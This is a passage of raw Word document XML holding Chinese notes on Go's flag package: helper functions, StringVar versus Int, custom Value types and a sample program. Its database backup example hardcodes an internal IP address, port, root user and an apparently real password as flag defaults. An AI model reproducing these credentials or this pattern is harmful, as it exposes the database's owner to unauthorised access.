        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5830DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-flag x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：只支持非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5722BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDC9D0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中，布尔类型的参数必须使用等号的方式指定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81E73F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B912877" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包的其他函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACA2922" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.Args()  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回命令行参数后的其他参数，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> []string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2898D744" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.NArg()  //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回命令行参数后的其他参数个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A872459" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag.NFlag() //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回使用的命令行参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8A193C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F707C3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60F18C25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D9A4C25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13680614" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BDF08E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C22F68" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A18EFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F72A19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7616BEAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="619DB229" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8BB76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CCA5A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB3D26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>"flag"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1665B9F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579C066E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AF91AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4573E938" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6E79B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var src string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAFEC1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>flag.StringVar(&amp;src, "src", "", "source file")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77020752" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.StringVar() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的这种方法返回的不是指针，是执行个动作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DFDF7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>var level *int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D53EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>直接是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.Int flag.String() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的这种方法返回的是指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED916DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    level = flag.Int("level", 0, "debug level")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F1AD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var memo string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC57C01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    flag.StringVar(&amp;memo, "memo", "", "the memory")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532FA4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>flag.Parse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB8F779" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    flag.Usage()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FAA9D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Printf("src=%s, level=%d, memo=%s\n", src, *level, memo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C523827" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09411FF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273FA82" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，我们还可以创建自定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag.Value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接口即可（要求</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> receiver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指针类型），这时候可以通过如下方式定义该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E1468" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>flag.Var(&amp;flagVal, "name", "help message for flagname")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241C90C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CAC772" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际样例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E524471" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局变量中声明类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15188FB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var backupPathPrefix, host, port, user, password, databaseName string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D8809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>var jetlag int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68C272" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF86EF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的接收和解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C52A75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;backupPathPrefix, "path", "/home/syj/wenhailin/", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>备份路径地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA9D9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;host, "ip", "192.168.3.199", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CE147" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;port, "port", "23306", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据库端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DB53CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;user, "user", "root", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据库用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AFF12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;password, "password", "1qaz@WSX", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数据库密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A882B54" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.StringVar(&amp;databaseName, "db", "sca", "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F334E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.IntVar(&amp;jetlag, "lag", 7, "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指定备份多长时间内的数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114106F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B4058D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
        <w:t>flag.Parse()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434595F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F96F0DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传参方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA2F061" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-path=/home/syj/wenhailin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC8584" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-ip=192.168.3.199</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAEF58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-port=23306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794CED5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
